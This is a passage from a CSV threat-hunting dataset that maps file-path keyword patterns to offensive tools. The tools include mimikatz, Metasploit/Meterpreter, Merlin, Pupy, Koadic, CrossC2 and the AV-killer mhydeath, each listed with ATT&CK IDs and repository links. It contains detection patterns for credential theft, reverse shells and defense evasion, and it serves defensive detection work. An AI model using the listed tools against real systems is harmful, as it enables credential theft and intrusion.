agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*/merlin.js*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z 
-*/merlin.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/merlin/agent_code/*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/Metasploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/metasploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/metasploit-framework/embedded/framework*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/metasploit-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metasploit-msgrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metasploit-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metatwin.git*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*/meterpreter*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/meterpreter/reverse_tcp*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/MFASweep.git*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*/mhydeath.git*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/mhydeath.sln*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/mhydeath/main.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/michaelweber/Macrome*,offensive_tool_keyword,Macrome,An Excel Macro Document 
Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/micr0%20shell.py*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*/micr0_shell.git*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*/MicroBurst.git*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*/mikrotik-routeros-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mimi32.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimi64.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimicom.idl*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimidrv.zip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*/mimikatz.sln*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypass/mimikatz.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypass/mimikatz2.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypassAV/main.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypassAV/mimikatz_load.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_load.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilib.def*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.rc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimipenguin.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mimipenguin.c*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipenguin.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mimipenguin/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipenguin/*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - 
TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipy.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/mimishim/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/minidump.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/minimal_elf.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 